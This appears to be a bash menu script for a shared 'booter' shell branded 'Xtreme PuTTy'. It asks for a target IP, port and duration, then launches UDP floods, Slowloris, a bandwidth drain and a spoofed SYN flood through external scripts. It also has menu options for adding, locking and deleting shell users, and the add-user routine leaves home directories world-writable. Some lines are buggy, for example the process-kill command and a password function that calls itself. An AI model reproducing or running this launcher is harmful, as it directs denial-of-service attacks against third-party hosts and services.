#!/bin/bash
BLACK='\e[0;30m'
BLUE='\e[0;34m'
GREEN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
PURPLE='\e[0;35m'
BROWN='\e[0;33m'
LIGHTGRAY='\e[0;37m'
DARKGRAY='\e[1;30m'
LIGHTBLUE='\e[1;34m'
LIGHTGREEN='\e[1;32m'
LIGHTCYAN='\e[1;36m'
LIGHTRED='\e[1;31m'
LIGHTPURPLE='\e[1;35m'
YELLOW='\e[1;33m'
WHITE='\e[1;37m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
exit_script()
{
  echo "* * *Trap * * *"
  ./menu
}

udp_flooda()
{
    clear
    echo -e " ${RED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              UDP FLOOD                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter the time in seconds"
read time
./gott.1.pl $ip $port 0 $time
}

udp_floodb()
{
    clear
    echo -e " ${RED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              UDP FLOOD                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
python gott.2.py $ip $port 1000
}

slap()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                            GoTT FLOOD                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./gott.3.pl $ip $port 65500 $time
}

slowloris()
{
    clear
    echo -e " ${RED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                              Slorloris                            ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target website please :"
read host
echo "Enter a Port Number :"
read port
./slowloris $host $port
}

killall()
{
    clear
    echo -e " ${RED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                    SirrUs is proud to present                     ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}               ___    _____ _____  __   _____   __  ${BLUE}               ¦¦¦ "
    echo -e "  ¦¦¦${RED}              / __|__|_   _|_   _| \ \ / /_  ) /  \ ${BLUE}               ¦¦¦ "
    echo -e "  ¦¦¦${RED}             | (_ / _ \| |   | |    \ V / / / | () |${BLUE}               ¦¦¦ "
    echo -e "  ¦¦¦${RED}              \___\___/|_|   |_|     \_/ /___(_)__/ ${BLUE}               ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                      Version 2.0 Admin                            ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
pkill gott.1.pl
pkill gott.2.py
pkill gott.2.pl
pkill gott.4.pl
pkill slowloris
}

fry()
{
    clear
    echo -e " ${RED} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦             SUPER AMAZING UDP FLOOD STOP WITH CTRL-C              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter IP Address :"
read ip
echo "Enter Port :"
read port
echo "Enter the time in seconds :"
read time
echo "Enter the thread count :"
read threads
perl gott.4.pl $ip $port 65500 $time $threads 1
}

passwd()
{
#!/bin/bash
clear
echo "  +=======================================================================+ "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 	
echo "  :::                   Change Password                                 ::: "
echo "  +=======================================================================+ "
echo "Enter new password :"
read passwd
passwd $passwd
}

lockkill()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +      List User Processes      + "
echo " +                               + "
echo " +-------------------------------+ "
echo "Enter Username: "
read uname
passwd -l $uname
kill -9 ps -u $uname -o "pid="
echo "press any key when done"
read
}

adduser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Add New User        + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "New Username: "
read uname
useradd $uname
mkdir /home/$uname
cp /home/gott/start /home/$uname/menu
passwd $uname 
cd /home/$uname
chmod 777 *
echo "User Added, Password set to GoTT"
echo "press any key when done"
read
}

deluser()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           Remove User         + "
echo " +                               + "
echo " +-------------------------------+ "
echo " "
echo "Username: "
read uname
userdel $uname
rm -r /home/$uname
echo "User removed"
echo "press any key when done"
read
}

lstprocesses()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +      List User Processes      + "
echo " +                               + "
echo " +-------------------------------+ "
echo "Enter Username: "
read uname
ps aux | grep -i $uname
echo "press any key when done"
read
}

whoson()
{
#!/bin/bash
clear
echo "+=================================+"
echo "+---------------------------------+"
echo " +           whos on             + "
echo " +                               + "
echo " +-------------------------------+ "
w
echo "press any key when done"
read
}

bw()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                    Bandwidth Drain coded in C                     ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
echo "Enter a the time :"
read time
./gott -i $ip -p $port -s 32000 -t $time
}

syn()
{
    clear
    echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo "  ¦¦¦                    Spoofed SyN Flood coded in C                   ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
echo "Enter target ip please :"
read ip
echo "Enter a Port Number :"
read port
./syn $ip $port
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
    clear
        echo -e " ${BLUE} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦             Xtreme PuTTy powered by Xtreme Inc                    ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
    echo -e "  ¦¦¦${RED}                      __  ___                     ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                      \ \/ / |_ _ _ ___ _ __  ___ ${BLUE}                 ¦¦¦ " 
    echo -e "  ¦¦¦${RED}                       >  <|  _| '_/ -_) '  \/ -_)${BLUE}                 ¦¦¦ "
    echo -e "  ¦¦¦${RED}                      /_/\_\\__ |_| \___|_|_|_\___|${BLUE}                 ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                           Version 1.0                             ¦¦¦ "
    echo "  ¦¦¦+--------------------------------------------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [1] ${RED} UDP Flood     ¦ ${LIGHTBLUE}   [2] ${RED}UDP Flood B   ¦ ${LIGHTBLUE}  [3] ${RED}Xtreme FlooD${BLUE}¦¦¦"
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [4] ${RED} SLOWLORIS     ¦ ${LIGHTBLUE}   [5] ${RED}Multithread Flood¦${LIGHTBLUE}[6] ${RED}Bandwidth  ${BLUE} ¦¦¦" 	
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [7] ${RED} SyN Flood     ¦${LIGHTBLUE}    [8] ${RED}Kill Attacks ¦${LIGHTBLUE} [9] ${RED}Change Password${BLUE}¦¦¦"  
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [10] ${RED}Lockout a user and Kill processes    ¦ ${LIGHTBLUE} [11] ${RED} Add User${BLUE}   ¦¦¦ "
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ " 
    echo -e "  ¦¦¦  ${LIGHTBLUE}   [12] ${RED}DELETE USER   ¦ ${LIGHTBLUE} [13] ${RED} LIST PROCESSES  ¦ ${LIGHTBLUE}[14] ${RED} WHOS ON ${BLUE}  ¦¦¦"	
    echo "  ¦¦¦+------------------------------------+-------------------------------¦ "
    echo -n " Enter your menu choice [1-14]: "
    read yourch
    case $yourch in
1) udp_flooda ;;
      2) udp_floodb ;;
      3) slap ;;
      4) slowloris ;;
      5) fry ;;
      6) bw ;;
      7) syn ;;
      8) killall ;;
      9) passwd ;;
      10) lockkill ;;
      11) adduser ;;
      12) deluser ;;
      13) lstprocesses ;;
      14) whoson ;;
      end) echo "As you Command" ;  exit 1  ;;
      end) pkill menu  ;;
      *) echo "Invalid Selection, Please make another selection" ;
         echo "Press a key. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_input1
#
Take_input1